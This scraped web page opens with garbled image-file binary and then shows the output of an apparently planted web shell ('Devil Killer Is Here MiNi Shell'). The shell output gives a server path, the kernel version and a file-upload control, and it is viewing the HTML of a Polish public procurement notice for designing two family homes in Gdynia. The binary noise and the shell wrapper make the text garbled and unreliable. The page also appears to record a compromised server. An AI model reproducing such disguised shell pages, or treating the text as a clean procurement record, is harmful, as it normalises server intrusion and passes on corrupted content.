JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240322/0025614401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Budowa 2 domów jednorodzinnych wraz z infrastrukturą i zagospodarowaniem terenu w Gdyni, przy ul. Rybaków” z opcją </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">LABORATORIUM INNOWACJI SPOŁECZNYCH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 363799128</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stefana Żeromskiego 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-346</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@lis.gdynia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">gdynia.pl/bip/lis</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa 2 domów jednorodzinnych wraz z infrastrukturą i zagospodarowaniem terenu w Gdyni, przy ul. Rybaków” z opcją </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8195dbbc-e825-11ee-9c02-ce2b643d361d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00256144</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00048838/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie dokumentacji i pełnienie nadzoru autorskiego dla inwestycji: Budowa 2 Rodzinnych Domów Dziecka wraz z infrastrukturą i zagospodarowaniem terenu w Gdyni przy ul. Rybaków z opcją</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://lisgdynia.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://lisgdynia.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">10.1. Komunikacja w niniejszym<br/>postępowaniu, składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a<br/>Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej eZamawiający<br/>(dalej platforma) wskazanej pod adresem https://lisgdynia.ezamawiajacy.pl/.<br/>10.2. Zgłoszenie do postępowania wymaga założenia konta i zalogowania Wykonawcy do platformy. Wykonawca rejestrując się<br/>akceptuje warunki korzystania z platformy, określone w Regulaminie podczas rejestracji oraz uznaje go za wiążący. Korzystanie z<br/>platformy jest bezpłatne.<br/>10.3. Zamawiający zastrzega, iż w sytuacji wystąpienia problemów z platformą (np. awarią systemu lub temu podobnych)<br/>komunikacja pomiędzy Zamawiającym a Wykonawcą, może odbywać się za pomocą skrzynki elektronicznej email, na adres<br/>wskazany w pkt 1.3 SWZ.<br/>Możliwość skorzystania z komunikacji w postaci skrzynki elektronicznej email, nie dotyczy czynności składania ofert i związanych z<br/>nią dokumentów. Oferty muszą być złożone zgodnie z postanowieniami rozdziału 14 i 15 niniejszej SWZ.<br/>10.4. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na platformie, ani<br/>logowania się.<br/>10.11. Zamawiający informuje o niezbędnych wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania<br/>korespondencji elektronicznej w niniejszym postępowaniu:<br/>10.11.1. Korzystanie z Platformy możliwe jest pod warunkiem spełnienia przez sprzęt, z którego korzystają użytkownicy Wykonawcy<br/>następujących minimalnych wymagań technicznych i specyfiki połączenia:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>3) Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>4) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>10.11.2. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2 GB w txt, rtf, pdf ,xps, odt, ods,<br/>odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv,<br/>zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>10.12. Użycie przez Wykonawcę do kontaktu z Zamawiającym środków komunikacji elektronicznej zapewnionych na platformie jest<br/>uzależnione od uprzedniej akceptacji przez Wykonawcę Regulaminu korzystania z usług platformy na witrynie internetowej przy<br/>zakładaniu profilu Wykonawcy.<br/>10.13. Do pełnego i prawidłowego korzystania z platformy przez Użytkowników Zewnętrznych konieczne jest posiadanie przez co<br/>najmniej jednego uprawnionego Użytkownika Zewnętrznego Wykonawcy elektronicznego podpisu kwalifikowanego lub podpisu<br/>zaufanego lub podpisu osobistego służącego do autentykacji i podpisu.<br/>10.14. Zamawiający, zgodnie z § 2 ust 1 rozporządzenia o elektronizacji informuje, że platforma jest kompatybilna ze wszystkimi<br/>podpisami elektronicznymi</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">24.1. Laboratorium Innowacji Społecznych, działając jako Zamawiający, zgodnie z art. 13<br/>ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuje,<br/>że Administratorem danych osobowych Wykonawcy jest Laboratorium Innowacji Społecznych – jednostka budżetowa Gminy Miasta<br/>Gdyni, 81-346 Gdynia, ul. Stefana Żeromskiego 31, reprezentowane przez Dyrektora Laboratorium Innowacji Społecznych, tel. 58<br/>727-39-00, email: sekretariat@lis.gdynia.pl.<br/>24.2. Administrator Danych Osobowych wyznaczył Inspektora Ochrony Danych, którym jest Aleksandra Cnota-Mikołajec. Kontakt z<br/>Inspektorem możliwy jest pod adresem e-mail: iod@eduodo.pl.<br/>24.3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzonym postępowaniem o<br/>udzielenie zamówienia publicznego, wzięcia udziału w postepowaniu, wyłonienia oferty najkorzystniejszej, zawarcia umowy z<br/>wybranym wykonawcą, realizacji umowy oraz w celu archiwizacji na podstawie ustawy z dnia 11 września 2019 r. – Prawo<br/>zamówień publicznych, a także na podstawie ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych.24.4.1. osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania zgodnie z ustawą z dnia 11 września 2019 r.<br/>– Prawo zamówień publicznych,<br/>24.4.2. organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy<br/>publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa,<br/>24.4.3. inne podmioty, które na podstawie stosownych umów przetwarzają dane osobowe administratora<br/>24.5. Dane osobowe Wykonawcy będą przechowywane co do zasady przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, zaś w przypadku zamówień współfinansowanych ze środków UE, przez okres obowiązywania trwałości<br/>projektu. Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (tj.<br/>Wykonawcy z którymi nie została zawarta umowa).<br/>24.6. Obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym<br/>określonym w przepisach uPzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z uPzp.<br/>24.7. W odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do<br/>art. 22 RODO.<br/>24.8. Wykonawca posiada:<br/>24.8.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>24.8.2. na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy *;<br/>24.8.3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>24.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2,<br/>00-193 Warszawa, tel.: 22 531 03 00, w godzinach pracy urzędu tj.: 8:00-16:00, adres poczty elektronicznej: kancelaria@uodo.pl,<br/>gdy Wykonawca uzna, że przetwarzanie danych osobowych dotyczących Wykonawcy narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z uPzp oraz nie<br/>może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/>24.9. Na podstawie art. 23 ust lit e) RODO Wykonawcy nie przysługuje:<br/>24.9.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>24.9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>24.9.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>24.10. Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia wszystkich obowiązków<br/>formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków tych należą m.in. obowiązki wynikające z RODO ), w<br/>szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i<br/>od których dane te Wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie<br/>miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (vide: art. 13 ust.<br/>4 RODO). Ponadto Wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art. 14 RODO względem osób<br/>fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej<br/>jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>24.11. Celem, potwierdzenia, iż Wykonawca dopełnił ww. obowiązki Wykonawca składa Oświadczenie, zawarte w Formularzu oferty<br/>w przedmiocie jak wyżej. Zamawiający zastrzega, iż Wykonawca, z którym zostanie zawarta umowa o udzielenie zamówienia<br/>publicznego, będzie zobowiązany (jeśli okaże się to konieczne) do zawarcia z Zamawiającym umowy powierzenia przetwarzania<br/>danych osobowych.<br/>24.12. Dane osobowe nie będą przekazywane do Państw trzecich.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2500.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1.	Przedmiotem zamówienia jest wykonanie koncepcji, kompletnej dokumentacji projektowo – kosztorysowej, pełnienie nadzoru autorskiego oraz przeniesienie całości autorskich praw majątkowych w tym prawa do zezwalania na wykonywanie zależnego prawa autorskiego do opracowanej dokumentacji na Zamawiającego dla inwestycji: „Budowa 2 domów jednorodzinnych wraz z infrastrukturą i zagospodarowaniem terenu w Gdyni, przy ul. Rybaków”.<br/>5.2.	Na przedmiot zamówienia składa się:<br/>5.2.1.	Wykonanie zakresu podstawowego: obejmującego opracowanie koncepcji dla dwóch budynków oraz opracowanie kompletnej dokumentacji projektowej i kosztorysowej dla jednego budynku wskazanego przez Zamawiającego.<br/>5.2.2.	Wykonanie Opcji: obejmującej opracowanie kompletnej dokumentacji projektowej i kosztorysowej dla drugiego budynku. <br/>5.3.	W zakres przedmiotu zamówienia wchodzi w szczególności:<br/>5.3.1.	opracowanie koncepcji,<br/>5.3.2.	opracowanie projektu zagospodarowania terenu, <br/>5.3.3.	opracowanie projektu architektoniczno-budowlanego, <br/>5.3.4.	opracowanie projektu technicznego, <br/>5.3.5.	uzyskanie pozwolenia na wycinkę lub przesadzenie drzew i krzewów (o ile będzie konieczne),<br/>5.3.6.	uzyskanie pozwolenia na rozbiórkę pozostałości budowli i budynków oraz innych elementów zagospodarowania terenu, w tym także infrastruktury, znajdujących się w obrębie działki (o ile będzie konieczne),<br/>5.3.7.	przygotowanie kompletnego wniosku o decyzję o podziale nieruchomości i ujawnienie podziału na mapach, wraz z niezbędnymi uzgodnieniami, opiniami i załącznikami, dla działek 127/1 i 128/3 obręb Babie Doły w Gdyni, w celu wydzielenia działek pod projektowane budynki,<br/>5.3.8.	przygotowanie i złożenie w imieniu Zamawiającego wniosku o pozwolenie na budowę,<br/>5.3.9.	uzyskanie niezbędnych uzgodnień, opinii i decyzji, etc. niezbędnych dla przedmiotu umowy,<br/>5.3.10.	przeniesienie całości autorskich praw majątkowych w tym prawa do zezwalania na wykonywanie zależnego prawa autorskiego do opracowanej dokumentacji na Zamawiającego,<br/>5.3.11.	opracowanie projektu wykonawczego,<br/>5.3.12.	przedmiary robót,<br/>5.3.13.	kosztorysy inwestorskie,<br/>5.3.14.	specyfikacje techniczne wykonania i odbioru robót budowlanych,<br/>5.3.15.	jednorazowa aktualizacja kosztorysów inwestorskich na wniosek Zamawiającego (aktualizacja kosztorysów inwestorskich nastąpić winna w terminie 3 tygodni od pisemnego wezwania Zamawiającego, jednak nie później niż w okresie 24 miesięcy od dnia podpisania ostatniego protokołu zdawczoodbiorczego ),<br/>5.3.16.	przygotowanie wizualizacji,<br/>5.3.17.	udzielanie wyjaśnień dotyczących opracowanej dokumentacji oraz dokonywanie ewentualnych jej modyfikacji (poprawek i uzupełnień), których konieczność wprowadzenia wynikać będzie z zadawanych pytań a także wniesionych odwołań i udzielanych odpowiedzi w ramach postępowania na wykonanie robót budowlanych, w ramach otrzymanego wynagrodzenia za przedmiot zamówienia,<br/>5.3.18.	pełnienie nadzoru autorskiego w trakcie realizacji robót budowlanych.<br/>5.4.	Szczegółowy zakres przedmiotu zamówienia został opisany w całej dokumentacji postępowania przede wszystkim w Opisie Przedmiotu Zamówienia stanowiącym załącznik nr 9 do SWZ.<br/>Na dokumentację postępowania składają się również wszelkie ewentualne zmiany SWZ i załączników oraz odpowiedzi na pytania dokonane na etapie postępowania.<br/>5.5.	W związku z realizacją zamówienia Wykonawca, którego oferta zostanie uznana za najkorzystniejszą zobowiązany będzie do posiadania ubezpieczenia od odpowiedzialności cywilnej OC w zakresie prowadzonej działalności związanej z przedmiotem umowy na sumę gwarancyjną nie niższą niż 400 000,00 zł (słownie: czterysta tysięcy złotych). Wykonawca ma obowiązek utrzymywać ciągłość i podaną wysokość ubezpieczenia przez cały okres realizacji umowy. Na wezwanie Zamawiającego Wykonawca zobowiązany będzie do przedłożenia potwierdzonej za zgodność z oryginałem aktualnej kopii polisy OC lub kopii umowy OC potwierdzającej posiadanie ubezpieczenia, w terminie określonym w wezwaniu, nie krótszym niż 3 dni robocze. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Wykonanie Opcji: obejmującej opracowanie kompletnej dokumentacji projektowej i kosztorysowej dla drugiego budynku.<br/>1. W celu skorzystania z opcji Zamawiający będzie uprawniony do złożenia Wykonawcy Oświadczenia o skorzystaniu z Opcji (uruchomienie opcji) w terminie wskazanym w §2 Umowy. Oświadczenie zostanie złożone w formie pisemnej.<br/>2. Złożenie oświadczenia o skorzystaniu przez Zamawiającego z Opcji zobowiązuje Wykonawcę do zrealizowania<br/>przedmiotu zamówienia, określonego w ust. 2 pkt. 2), zgodnie z zapisami niniejszej Umowy.<br/>3. Zamawiający zastrzega możliwość skorzystania z Opcji pod warunkiem zabezpieczenia odpowiednich środków w<br/>budżecie Zamawiającego. W przypadku nie skorzystania z opcji, w terminie wskazanym w umowie, Wykonawcy nie<br/>przysługują z tego tytułu żadne roszczenia w stosunku do Zamawiającego.<br/>4. Termin wykonania Opcji:<br/>Zamawiający ma prawo do skorzystania z opcji do 250 dnia od podpisania umowy, na następujących zasadach:<br/>1) Jeżeli Zamawiający podejmie decyzję o skorzystaniu z opcji do 90 dnia od podpisania umowy, wówczas terminy<br/>określone powyżej dla zakresu podstawowego pozostają niezmienne i obejmują wykonanie zakresu podstawowego i opcji.<br/>2) Jeżeli Zamawiający podejmie decyzję o skorzystaniu z opcji po 90 dniu od dnia podpisania umowy termin na opracowanie<br/>kompletnej dokumentacji projektowej i kosztorysowej dla drugiego budynku wynosi 150 dni od dnia złożenia Wykonawcy<br/>Oświadczenia o skorzystaniu z Opcji (uruchomienia opcji). <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">250 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta z uprawnieniami do projektowania bez ograniczeń w branży architektonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 